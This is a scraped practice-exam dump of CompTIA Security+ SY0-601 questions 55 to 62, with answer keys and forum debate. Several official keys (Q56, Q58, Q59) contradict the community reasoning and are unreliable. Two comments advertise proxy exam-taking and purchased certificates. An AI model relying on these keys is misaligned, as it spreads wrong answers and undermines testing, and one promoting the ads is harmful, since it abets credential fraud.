the attacker will be able to remotely control the host. This is generally done from inside the target network.

Connections initiated from inside of the company network are ,in most cases, allowed by the firewalls, but not vice versa. Generally you cannot
connect from the outside so easily. So, in many documented attacks identifying the command and control channel in firewall or DNS logs was
actually the first proof that indicated the presence of compromised systems and it's still one of the first methods of detecting apts in your
network.
upvoted 2 times

  carpathia 2 months, 4 weeks ago


Selected Answer: B
Command and Control - the adv is able to maintain presence mentioned in the q.
upvoted 1 times

  babyzilla 3 months ago


A is not a feasible answer because the actor is already on the network. If you don't know the steps, visit
https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack/

D is not feasible because there is no mention of exploitation in the question.

Both B and C are feasible, but because lack of information in the question, B would be the best choice. Since the actor is or can communicate
outbound, there is a clear Command and Control (C2) issue at hand. The next step would be Actions of Objective, which would be to carry out
their malicious intent (e.g. ransomware, DDOS). However, we can only assume B because the actor could still be awaiting further instructions
using their C2 posture. I hope this helps. Somewhat of a tricky question, but I think everyone is on the same page with this one. Thanks & Good
Luck!
upvoted 2 times

  Jossie_C 3 months ago


Outbound traffic not restricted means the adversary can communicate with the victim system out-of-network
upvoted 1 times

  Fitzd 4 months, 3 weeks ago


Just asking, was he already doing C2, that would make the next move
Weaponization. ...
Delivery. ...
Exploitation. ...
Installation. ...
Command and Control. ...
Actions on Objectives
upvoted 1 times

  BM9904 4 months, 3 weeks ago


Selected Answer: D
Keyword "still" therefore attacker still has access: Actions on Objective: Once the attacker / intruder gains persistent access, they finally take
action to fullfil their purpose, such as encryption for ransom, data exfiltration or even data destruction.
upvoted 2 times

  BM9904 4 months, 3 weeks ago


Disregard should be B not C
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 100/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #55 Topic 1

A recent security breach exploited software vulnerabilities in the firewall and within the network management solution. Which of the following will
MOST likely be used to identify when the breach occurred through each device?

A. SIEM correlation dashboards

B. Firewall syslog event logs

C. Network management solution login audit logs

D. Bandwidth monitors and interface sensors

Correct Answer: A

Community vote distribution


A (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: A
SIEM could tell when the breach occurred in firewall AND in network management solution
upvoted 21 times

  stoneface 5 months ago


I concur
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 101/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #56 Topic 1

Which of the following is the FIRST environment in which proper, secure coding should be practiced?

A. Stage

B. Development

C. Production

D. Test

Correct Answer: A

Community vote distribution


B (83%) Other

  varun0 Highly Voted  5 months ago


Selected Answer: B
Development

The developer has to start writing secure code from beginning itself. Which will then be tested, staged and finally production
upvoted 17 times

  comeragh Highly Voted  4 months, 1 week ago


Selected Answer: B
Development, Testing, Staging, Production
upvoted 5 times

  DALLASCOWBOYS Most Recent  6 days, 7 hours ago


B. Development which is the 1st step and secure practicing code should be used in all phases.
upvoted 1 times

  yukben558 1 week, 4 days ago


GET CERTIFIED.
100%PASS GUARANTEED.

WhatsApp +1(409)223 7790


1. COMPTIA (network+ security+)

2: GMAT,GRE exams

3: IAPP Certifications
(CIPP/ CIPM, CIPT)

4: ISACA certifications (CISA,CISM/ CRISC)

5: EC-COUNCIL Certification (CEH , CCISO )

6: PMI (PMP/CAPM/ACP/PBA ,RMP)

7: IMA (CMA certification)

8: CIA,IFRS, CERTIFICATIONS

9: ACCA,CFA,ICAEW certifications

10: ISO certification

11 PASS CISSP EXAM

12. CSCP CERTIFICATION

Book for online proctor exam and we’ll remotely take the exam for you. Pay us after confirmation of results
ITTCA.org

WhatsApp +1(409)223 7790


upvoted 1 times

  nul8212 1 month, 2 weeks ago


Selected Answer: A
The question needs to ask what the first step of the environment is. It asks for the first step before the software is ready to get sold.
Staging: ensure quality assurance before we roll it out to production.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 102/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times

  Sandon 2 weeks, 3 days ago


Wrong, it does not ask for the first step before the software is ready to get sold.
upvoted 2 times

  Nirmalabhi 2 months ago


Selected Answer: A
development is the first stage in the environment stages. its pretty straight forward
upvoted 1 times

  [Removed] 2 months, 3 weeks ago


BUY ISACA CERTIFICATES [CISA, CISM,CRISC] PAY AFTER RESULTS WhatsApp +1 (409) 223 7790

GET CERTIFIED IN 2 DAYS. 100% PASS GUARANTEED.


PAY AFTER RESULTS

1. COMPTIA Certification
2. IAPP CERTIFICATION CIPP/E,CIPM,CIPT,FIB
3. Scrum Master
4. GMAT Certification
5. Cisco Certification: CCNA, CCNP
6. ITIL Foundation & Intermediate
7. Prince 2 Foundation and Practitioner
8. ACCA Certification
9. Check Point Certification (CISA, CISM)
10. EC-COUNCIL Certification (CEH V-9) CCISO
11. GRE Certification
12. CIA Certification
13. PASS GMAT EXAM AND PAY AFTER PASS RESULTS
14. PASS GRE EXAM AND PAY AFTER PASS RESULTS
15. Juniper certification
16. pass ACCA EXAM AND PAY AFTER PASS RESULTS
17.PASS CIA EXAM AND PAY AFTER PASS RESULTS
18.PMI (PMP / CAPM / ACP / PBA, RMP)
19.PASS CMA EXAM AND PAY AFTER PASS RESULTS
upvoted 1 times

  bengy78 2 months, 3 weeks ago


Its B, the first stage is development. Per Comptia Certmaster "DevSecOps extends the boundary to security specialists and personnel, reflecting
the principle that security is a primary consideration at every stage of software development and deployment. "
upvoted 1 times

  Abisoye 2 months, 3 weeks ago


A staging environment (stage) is a nearly exact replica of a production environment for software testing. Staging environments are made to test
codes, builds, and updates to ensure quality under a production-like environment before application deployment.
upvoted 2 times

  lordguck 3 months, 1 week ago


The question is about coding, so it's B.
upvoted 1 times

  BigV 3 months, 2 weeks ago


Definitely B.
https://techbeacon.com/app-dev-testing/security-usability-go-hand-hand-5-tips-get-development-mix-right
upvoted 1 times

  Tomtom11 4 months ago


Selected Answer: D
Testing of the application throughout the software
development lifecycle can determine the actual security risk profile of a
system. (From the Comptia Book)
upvoted 1 times

  Rasyidul 4 months, 1 week ago


Selected Answer: A
Staging

I believe the Test environment will still identify security flaw in the source code. This mean that the first environment for proper secured source
code would be Staging where the environment is the same as Production environment.

Please correct me if I'm wrong.


upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 103/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  alayeluwa 3 months, 3 weeks ago


Yup, happy to tell you that you are very wrong but its ok ;)

It’s B; Development comes first.


upvoted 4 times

  RonWonkers 4 months, 3 weeks ago


Selected Answer: B
Development
upvoted 1 times

  carpathia 4 months, 3 weeks ago


Selected Answer: B
Development is the 1st environment
upvoted 1 times

  FQ 4 months, 3 weeks ago


Selected Answer: B
Development, is the first environment.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 104/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #57 Topic 1

A cloud service provider has created an environment where customers can connect existing local networks to the cloud for additional computing
resources and block internal HR applications from reaching the cloud. Which of the following cloud models is being used?

A. Public

B. Community

C. Hybrid

D. Private

Correct Answer: C

Community vote distribution


C (71%) D (29%)

  varun0 Highly Voted  5 months ago


Selected Answer: C
Hybrid cloud since internal network and cloud computing is combined
upvoted 13 times

  ronniehaang Most Recent  4 days, 18 hours ago


Selected Answer: C
C. Hybrid. A hybrid cloud model combines a private cloud with a public cloud and is used by organizations that need to keep some data and
applications in-house for privacy, security, or regulatory reasons, but also want to take advantage of the scalability and cost-effectiveness of
public cloud services for other workloads. In this scenario, the customer has connected their existing local network to the cloud for additional
computing resources and has taken steps to block certain internal applications from reaching the cloud, which indicates that the hybrid cloud
model is being used.
upvoted 1 times

  DALLASCOWBOYS 6 days, 7 hours ago


C. A Hybrid cloud is a mixture of private and public cloud components. Example, an org. can host a private cloud for exclusive internal use, but
distribute some resources on a public cloud for business partners, customers, etc.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: C
Hybrid cloud refers to a combination of at least 2 computing environments that share information with one another and run a uniform series of
applications for a business or enterprise. Those environments may include: At least 1 private cloud and at least 1 public cloud. 2 or more private
clouds. 2 or more public clouds.
upvoted 2 times

  ZDW 3 weeks ago


I see people keep saying that a "public cloud" isn't mentioned but is that not what a "Clous Service Provider" is? A Cloud Service Provider
(public cloud) has created an environment for customers sounds like either public or hybrid (only because it does not expressly say there is a
private cloud at all)
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: D
Hybrid is combination for Public and Private but question doesn’t have that mentioned so I’m going with D
upvoted 1 times

  sanlibo 1 week, 6 days ago


Private is the internal HR
upvoted 1 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: C
Hybrid
upvoted 2 times

  rhocale 1 month, 3 weeks ago


yes hybrid seems right to me both public use (customers) and private (HR)
upvoted 1 times

  okay123 2 months, 2 weeks ago


Selected Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 105/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

See because they mentioned internal HR + External Customers = Hybrid


upvoted 4 times
  Ayzaza 2 months, 3 weeks ago
Selected Answer: D
SP supplies private cloud service for their customers!
upvoted 1 times

  babyzilla 3 months ago


Selected Answer: D
Since there is no mention of public usage (which is required for a hybrid solution), only private would make sense to me. But, of course, it's
COMPTIA and I could be wrong lol
upvoted 2 times

  blacktaliban 3 months ago


Yea I'm going with C ... Customer is public and HR is private
upvoted 2 times

  lordguck 3 months ago


D:, C is false as it's not mentioned, that the HR apps use cloud funtionality in any way.
upvoted 1 times

  B2100 3 months, 1 week ago


Selected Answer: D
https://azure.microsoft.com/en-us/resources/cloud-computing-dictionary/what-are-private-public-hybrid-clouds/#overview. "A hybrid cloud is a
type of cloud computing that combines on-premises infrastructure—or a private cloud—with a public cloud. Hybrid clouds allow data and apps
to move between the two environments." In that case it is not Hybrid cloud
upvoted 1 times

  comeragh 4 months, 1 week ago


Selected Answer: D
Private Cloud. "connect existing local networks to the cloud"

Private cloud is cloud computing that is dedicated solely to your organization. Hybrid cloud is any environment that uses both public and private
clouds.
upvoted 2 times

  Gravoc 4 months, 2 weeks ago


Private cloud = A cloud infrastructure setup and intended specifically for one client/customer.

Community Cloud = A cloud infrastructure shared by organizations within the same industry. "Communitizes" the costs of cloud computing to
reduce the cost burden per entity. Such as banking organizations going in together on a community cloud platform designed specifically for the
banking industries cloud computing needs.

Hybrid = A mixed model where computing, storage, and applications are both on-premise and in the cloud, as well as utilizing more than one
cloud service. Most organizations are a hybrid cloud.

Public = Any cloud service offered to the general public. Ranging from Google Drive, Microsoft Azure, Amazon Web Services, and Microsoft
OneNote.
upvoted 3 times

  mark9999 4 months, 3 weeks ago


Hybrid cloud refers to a mixed computing, storage, and services environment made up of on-premises infrastructure, private cloud services, and
a public cloud—such as Amazon Web Services (AWS) or Microsoft Azure—with orchestration among the various platforms. Answer is C a Hybrid.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 106/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #58 Topic 1

An organization has developed an application that needs a patch to fix a critical vulnerability. In which of the following environments should the
patch be deployed
LAST?

A. Test

B. Staging

C. Development

D. Production

Correct Answer: C

Community vote distribution


D (93%) 7%

  varun0 Highly Voted  5 months ago


Selected Answer: D
LAST place to deploy the patch is production
upvoted 16 times

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: D
Production should be the last place where to apply patches as you have already tested properly
upvoted 9 times

  ronniehaang Most Recent  4 days, 18 hours ago


Selected Answer: D
The patch should be deployed LAST in the Production environment. Deploying the patch in the Production environment should be done with
care, as it is the live environment where the application is running and serving users. The patch should have been thoroughly tested in a Test
environment, and any necessary adjustments should have been made in the Development or Staging environment. This is to ensure the patch
doesn't cause any unexpected issues in the Production environment, where any issue can have the greatest impact.
upvoted 1 times

  DALLASCOWBOYS 6 days, 6 hours ago


D. Production, as you want to evaluate the patch to ensure the it doesnt impact the live production environment.
upvoted 1 times

  xxxdolorxxx 1 week, 6 days ago


Selected Answer: D
D. Production is always the final place you make changes.
upvoted 2 times

  xxxdolorxxx 2 weeks, 2 days ago


Selected Answer: D
My vote goes to D.
upvoted 2 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: D
Production
upvoted 1 times

  EubertT 1 month, 3 weeks ago


Please refer to this link and understanding the sequence instead of guessing:
https://www.flagship.io/test-environment/
When deploying a new release to production, rather than immediately deploying to all users, the release can be deployed in phases to a segment
of your users first to see how it performs to catch and fix any additional bugs before deploying to the rest of your users.
upvoted 2 times

  learnNcurve 2 months ago


Selected Answer: B
I would say B, because the staging phase you are able to simulate an environment as close to the real one to ensure the product works correctly.
If any issues were found they would be patched and retested.
I do not think it is D since that is when the product is entering the live stage.
Then again how could it be C?

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 107/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 3 times
  carpathia 2 months, 2 weeks ago
These are not questions to test your knowledge, but rather the twisted logic in the question (more like puzzles)... It's ridiculous.
upvoted 4 times

  BigV 3 months, 2 weeks ago


What’s a staging environment?
Your staging environment is a setup that replicates your production environment. In short, it’s an identical replica of your product. You shouldn’t
be able to tell find any differences between your staging environment and your final product. But unlike your final product, it’s not for public
domain.

Think of it as a safe space where you can throw everything together and find out how it works. It’s the ultimate Quality Assurance test because
it’s as close to the real thing as you can get.
upvoted 2 times

  [Removed] 3 months, 3 weeks ago


Selected Answer: D
answer (D.Producation )
The production environment is the live system. Software,
patches, and other changes that have been tested and
approved move to production.

reference : CompTIA® Security+®


Study Guide
Exam SY0-601
Eighth Edition

by Mike Chapple
David Seidl
upvoted 3 times

  4342421222 4 months ago


Answer is C.
All systems need to be patched, before being pushed to production.
upvoted 2 times

  comeragh 4 months, 1 week ago


Selected Answer: D
Development, Testing, Staging, Production
upvoted 2 times

  db97 4 months, 1 week ago


Staging first and finally in production. D is correct.
upvoted 2 times

  msyusa 4 months, 2 weeks ago


Staging environments are made to test codes, builds, and updates to ensure quality under a production-like environment before application
deployment. The staging environment requires a copy of the same configurations of hardware, servers, databases, and caches.
upvoted 2 times

  Halaa 4 months, 2 weeks ago


Agree with you
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Production environments are end of the line. That's the live server/service environment. You NEVER want to implement anything into production,
without first having thoroughly tested it in a staging virtualization environment. If it's a coding patch, as in the organizations' developers
themselves are writing code to modify the production code repository. Then it starts with development first. If it's a downloaded vulnerability
patch from a 3rd party like Microsoft, you skip development and jump right into staging.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 108/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #59 Topic 1

An organization is building backup server rooms in geographically diverse locations. The Chief Information Security Officer implemented a
requirement on the project that states the new hardware cannot be susceptible to the same vulnerabilities in the existing server room. Which of
the following should the systems engineer consider?

A. Purchasing hardware from different vendors

B. Migrating workloads to public cloud infrastructure

C. Implementing a robust patch management solution

D. Designing new detective security controls

Correct Answer: B

Community vote distribution


A (89%) 11%

  brewoz404sd 2 days, 21 hours ago


The answer is C, not A at all! Different hw does nothing to mitigate failure or vulnerabilities. Migrating some infrastructure / workloads to cloud
mitigates the SAME failure / vulnerabilities as the previous dc. C!
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: A
"new hardware cannot be susceptible to the same vulnerabilities in the existing server room"
upvoted 1 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: B
Different vendors can use similar chips. It says "geographically diverse locations" That is why the cloud is the best solution.
upvoted 2 times

  blacktaliban 3 months ago


Different vendors different hardware ,different vulnerabilities
upvoted 3 times

  Libraboy 3 months, 2 weeks ago


Selected Answer: A
"....that states the new hardware cannot be susceptible to the same vulnerabilities..."
emphasis on the new hardware!
upvoted 2 times

  _bishalk__ 4 months, 1 week ago


Vendor diversity. Ans is A.
upvoted 1 times

  Bob455 4 months, 1 week ago


How is this A? vuln servers are due to misconfigurations and weak securiy controls, shouldnt it be D. that has nothing to do with who you
purchase from
upvoted 1 times

  Strykar 4 months, 2 weeks ago


Selected Answer: A
It's A. Who's answering these questions?
upvoted 4 times

  Demilitarized_zone 3 months, 1 week ago


help me ask please.... i feel the owners of this platform should get professionals to answer these questions. Many of the answers are clearly
wrong.
upvoted 2 times

  Ggonza3 2 months, 4 weeks ago


I think that they're not allowed to outright post the correct answers, hence why this website is community based.
upvoted 2 times

  Gravoc 4 months, 2 weeks ago


Don't let this one trip you up. A seems to be too easy of an answer, but it's A. Part of the reason it tripped me up is anytime I learned about
vender diversity, it was always in the context of anti-malware, SIEM, NIDS, etc. Never dawned on me that vendor diversity also applies to
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 109/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

physical hardware, but it makes sense. Vender diversity is a part of the swiss cheese model, or defense-in-depth. Having your production server,
and your backup server running identical configurations means that there's two perfectly aligned holes in the swiss cheese model. Meaning the
integrity of the backup server cannot be trusted in the event of an attack that damages or shuts down the production server. Different hardware is
a defense layer that gives the defenders a buffer time to get their operation back in order, and defend against potentially inbound attacks on the
backup server.
upvoted 4 times
  redsidemanc2 4 months, 4 weeks ago
Selected Answer: A
different vendors, different products, different vulns on the devices. if you have all cisco equipment the vulns on the switches are the same.
upvoted 3 times

  usam2021 5 months ago


Answer A promotes vendor diversity.
upvoted 3 times

  Wiggie 5 months ago


Selected Answer: A
The answer is A
upvoted 1 times

  yorkwu 5 months ago


Selected Answer: A
I agree with A
upvoted 1 times

  cozzmo 5 months ago


Selected Answer: A
What's wrong with A?
upvoted 4 times

  Joe1984 5 months ago


Agreed, A makes more sense.
upvoted 1 times

  varun0 5 months ago


I agree with A
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 110/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #60 Topic 1

A security analyst is working on a project to implement a solution that monitors network communications and provides alerts when abnormal
behavior is detected.
Which of the following is the security analyst MOST likely implementing?

A. Vulnerability scans

B. User behavior analysis

C. Security orchestration, automation, and response

D. Threat hunting

Correct Answer: B

Community vote distribution


B (65%) C (35%)

  Sepu Highly Voted  4 months, 3 weeks ago


Selected Answer: B
B.
SOAR will react to the alert.
upvoted 14 times

  deeden 2 months ago


You mean C. SOAR ?
upvoted 3 times

  Nirmalabhi Highly Voted  2 months ago


Selected Answer: B
Not 100% sure but i will go with B. User behavior Analysis.

Reason: As per Comptia objectives, User behavior Analysis comes under SIEM. Well as the Question asks whats most likely the solution being
implemented hence User behavior analysis seems to be the direct answer. SOAR simply means you are adding automation and servers handle
the security tasks automatically and take action. happy to discuss. Some of the question are to confuse so i ll stick to most direct connection in
this case. B
upvoted 11 times

  tebirkishaw Most Recent  3 days, 14 hours ago


Selected Answer: B
There is no automation of tasks going on, just an alert. Nothing is being fixed. Has to be B
upvoted 2 times

  DALLASCOWBOYS 6 days, 6 hours ago


C. SOAR.
upvoted 1 times

  P0wned 1 month ago


Selected Answer: C
The security analyst is most likely implementing security orchestration, automation, and response (SOAR). SOAR solutions are designed to
monitor network communications and provide alerts when abnormal behavior is detected. SOAR solutions typically use artificial intelligence and
machine learning to analyze network traffic and identify potential security threats. They can also be configured to take automated responses,
such as blocking malicious traffic or quarantining suspicious files, to help protect the network.

Vulnerability scans, user behavior analysis, and threat hunting are all important security practices, but they are not specifically related to
monitoring network communications and providing alerts when abnormal behavior is detected.
upvoted 1 times

  LaoX 1 month ago


Selected Answer: B
Seems to me like something for IDS. The IDS is a particular procedure that is used to identify intruders by analyzing user behavior in the system
after the user logged in. It identifies user suspicious behavior as an intrusion or normal behavior but the SOAR helps coordinate, execute and
automate tasks between various people and tools all within a single platform. Totally different purpose.
upvoted 1 times

  its_melly 1 month, 3 weeks ago


Selected Answer: B
"UEBA is an extension of SIEM where, in addition to observing suspicious network behavior, they also trigger alerts when unusual entity or user
behavior is observed"
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 111/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 2 times
  tek7ila 2 months ago
Selected Answer: B
I stand corrected. After some reading I will go with B.

"Behavioral-based detection means that the engine is trained to recognize baseline


"normal" traffic or events. Anything that deviates from this baseline (outside a defined
level of tolerance) generates an incident. The idea is that the software will be able to
identify zero day attacks, insider threats, and other malicious activity for which there is
single signature." <---it fits perfectly
upvoted 4 times

  tek7ila 2 months, 1 week ago


I would go with C. It only says abnout abnormal behaviour - it was never saids it has to be user behaviour. So logically speaking SOAR should be
the right answer.
upvoted 3 times

  carpathia 2 months, 2 weeks ago


Selected Answer: C
UBA is a SIEM feature, not a standalone product (Comptia books). SOAR looks more like it. UBA looks at who why launching apps, who
accessed what, abnormal patterns of users (opening certain files etc) proving malicious intent etc.
upvoted 5 times

  FMMIR 2 months, 2 weeks ago


Selected Answer: B
SOAR (Security Orchestration, Automation, and Response) is an independent product. SOAR allows a company to respond to events. For
example, if ES detects an authorized access, SOAR might be configured to tell the network to block that access. Since SOAR is a separate
product it does not require Splunk Enterprise, but the two can work together.

UBA (User Behavior Analytics) is another independent product. It monitors activity on a network and alerts when it notices "unusual" activity. An
activity is considered "unusual" if it breaks the pattern UBA has noticed in the past (using machine learning). It, too, can work with Splunk
Enterprise, but does not require it.
upvoted 3 times

  Biyo 2 months, 2 weeks ago


User and entity behavior analytics (UEBA)
– Detect insider threats
– Identify targeted attacks
– Catches what the SIEM and DLP systems might miss
• Sentiment analysis
– Public discourse correlates to real-world behavior
– If they hate you, they hack you
– Social media can be a barometer
SOAR
• Security orchestration, automation, and response
– Automate routine, tedious, and time intensive activities
• Orchestration
– Connect many different tools together
– Firewalls, account management, email filters
• Automation - Handle security tasks automatically
• Response - Make changes immediately
.... SOAR
upvoted 1 times

  okay123 2 months, 3 weeks ago


Selected Answer: B
B: User and entity behavior analytics (UEBA), also known as user behavior analytics (UBA), is the process of gathering insight into the network
events that users generate every day. Once collected and analyzed, it can be used to detect the use of compromised credentials, lateral
movement, and other malicious behavior-

https://www.rapid7.com/fundamentals/user-behavior-
analytics/#:~:text=User%20and%20entity%20behavior%20analytics%20(UEBA)%2C%20also%20known%20as,movement%2C%20and%20ot
her%20malicious%20behavior.
upvoted 2 times

  nobnarb 2 months, 3 weeks ago


Selected Answer: B
User behavior analytics sometimes called user entity behavior analytics (UEBA), is a category of software that helps security teams identify and
respond to insider threats that might otherwise be overlooked.
upvoted 3 times

  carpathia 2 months, 4 weeks ago


Selected Answer: C
UBA has only got to do with the end-user - I don't see that in the question, dven though "behaviour" is mentioned. It must be SOAR
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 112/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  babyzilla 3 months ago


Selected Answer: B
I'm going with B. UBA is not as intensive of a project compared to implementing SOAR. The scope of the project seems to be more simple. I
think SOAR would be overthinking this scenario.
upvoted 3 times

  blacktaliban 3 months ago


Selected Answer: B
Yea B
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 113/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #61 Topic 1

Data exfiltration analysis indicates that an attacker managed to download system configuration notes from a web server. The web-server logs
have been deleted, but analysts have determined that the system configuration notes were stored in the database administrator's folder on the
web server. Which of the following attacks explains what occurred? (Choose two.)

A. Pass-the-hash

B. Directory traversal

C. SQL injection

D. Privilege escalation

E. Cross-site scripting

F. Request forgery

Correct Answer: BD

Community vote distribution


BD (90%) 5%

  carpathia Highly Voted  2 months, 2 weeks ago


Selected Answer: BD
"admin's folder" - Priv escalation, + dir transversal. "database" is thrown in as a decoy for SQL answer.
upvoted 6 times

  j0n45 Highly Voted  4 months, 3 weeks ago


Selected Answer: BD
Directory traversal and Privilege escalation.
upvoted 5 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: BD
Answer: B. Directory traversal & D. Privilege escalation

Directory traversal is a type of HTTP exploit in which a hacker uses the software on a web server to access data in a directory other than the
server's root directory. If the attempt is successful, the threat actor can view restricted files or execute commands on the server.

Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to
gain elevated access to resources that are normally protected from an application or user.
upvoted 4 times

  G4ct756 3 months, 2 weeks ago


Selected Answer: CD
C & D,
- c, the admin notes are stored in "the database", Will require SQLi to interact with DB.
- d, need privilege to clear the system logs.
upvoted 1 times

  hieptran 3 weeks, 5 days ago


Read the question carefully. It clearly stated: "database administrator's folder". It has nothing to do with SQL injection.
upvoted 1 times

  FT1 5 months ago


B&D
The simplest example of a directory traversal attack is when an application displays or allows the user to download a file via a URL parameter.
upvoted 4 times

  Wiggie 5 months ago


Selected Answer: BC
B and C
upvoted 1 times

  Wiggie 5 months ago


Correction, B and D
upvoted 2 times

  varun0 5 months ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 114/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: BD
B & D seem to be correct.
upvoted 3 times

  varun0 5 months ago


Also don't assume just because there's a db admin there'd be a database. DB or web application interface (XSS) is not a requirement for a
web server, don't assume there is one.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 115/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #62 Topic 1

A junior security analyst is conducting an analysis after passwords were changed on multiple accounts without users' interaction. The SIEM have
multiple login entries with the following text: suspicious event - user: scheduledtasks successfully authenticate on AD on abnormal time
suspicious event - user: scheduledtasks failed to execute c:\weekly_checkups\amazing-3rdparty-domain-assessment.py suspicious event - user:
scheduledtasks failed to execute c:\weekly_checkups\secureyourAD-3rdparty-compliance.sh suspicious event - user: scheduledtasks
successfully executed c:\weekly_checkups\amazing-3rdparty-domain-assessment.py
Which of the following is the MOST likely attack conducted on the environment?

A. Malicious script

B. Privilege escalation

C. Domain hijacking

D. DNS poisoning

Correct Answer: A

Community vote distribution


A (73%) B (25%)

  CertAddict69 Highly Voted  4 months, 2 weeks ago


Selected Answer: A
This is obviously A, malicious script. Look at the name of the script that is running:
"amazing-3rdparty-domain-assessment.py"

I'm sure they used the word amazing in the file name so that the script appears as a malicious script that is disguised as a 3rd party domain
assessment script.
upvoted 17 times

  hazeleyes Highly Voted  4 months, 3 weeks ago


Selected Answer: B
B. the hacker were able to gain control to a service account "scheduledtask", then attempted to execute a command which failed, presumably
due to admin privilege requirements. the hacker then used a .sh script to execute an privilege escalation to obtain admin privilege. Which is why
the 3rd input (which is identical to the first) is successful.
upvoted 6 times

  Jossie_C 3 months ago


Dude? It's malicious script.
upvoted 3 times

  TR3Y 4 months, 2 weeks ago


I concur
upvoted 1 times

  FiendForce138 4 months, 1 week ago


The question is not asking how the attacker gained access to AD but instead what they are doing once they got there. They obviously
blocked legitimate .sh scripts and ran their own malicious scripts. You guys are overthinking it.
upvoted 5 times

  scarceanimal Most Recent  1 day, 4 hours ago


Selected Answer: A
"amazing-3rdparty-domain-assessment.py" lol they put amazing hilarious
upvoted 1 times

  hsdj 4 days, 4 hours ago


passwords were changed on multiple accounts without users' interaction - looks like privileged account activity to me
upvoted 1 times

  hsdj 4 days, 4 hours ago


option "malicious script" is not TYPE of attack! so my answer is privilege escalation B
upvoted 1 times

  asum 2 weeks, 3 days ago


Selected Answer: B
It is talking about attack. So B
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 116/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  farisAl 3 weeks, 5 days ago


Selected Answer: A
execute c:\weekly_checkups\amazing-3rdparty-domain-assessment.py
The .py at the end gave it away it's a malicious script
upvoted 2 times

  LaoX 1 month ago


Selected Answer: A
Definitely A: Malicious Scripts. Cos look at these: 1. weekly_checkups\secureyourAD-3rdparty-compliance.sh 2. scheduledtasks, and 3.
amazing-3rdparty-domain-assessment. All those are definitely malicious names that results in password changes.
upvoted 1 times

  rhocale 1 month, 3 weeks ago


agreed this is a malicious script you can tell this bc of the .PY at the end meaning Pythin script
upvoted 1 times

  tek7ila 2 months ago


Selected Answer: A
I also agree that's an A
upvoted 2 times

  okay123 2 months, 3 weeks ago


Selected Answer: A
Its A-Malicious Script
upvoted 2 times

  Jossie_C 3 months ago


It's not privilege escalation. Scheduledtasks is not something that a user controls.
upvoted 1 times

  TryingToLearn19 3 months, 1 week ago


Selected Answer: A
I believe its a Malicious Script, a .py is a python file, seems like a script was trying to be ran.
upvoted 3 times

  MarciaL 3 months, 2 weeks ago


Selected Answer: D
I am thinking D.
upvoted 1 times

  comeragh 4 months, 1 week ago


Would 2 references to this within the question "scheduledtasks failed to execute" rule out malicious script?
upvoted 1 times

  IT_kiddie 4 months, 1 week ago


Selected Answer: A
".py" in the question means Python, so I think it's most likely a script
upvoted 4 times

  k9_462 4 months, 3 weeks ago


Selected Answer: B
seems like B to me. attacker was able to gain access, then had a few failed attempts, then eventually was able to escalate his privileges. not
100% sure on this one though.
upvoted 3 times

  FT1 5 months ago


A-Malicious scripts are fragments of code that have been modified by threat actors for nefarious purposes. Cyber threat actors hide them in
legitimate websites, third-party scripts, and other places to compromise the security of client-side web applications and webpages
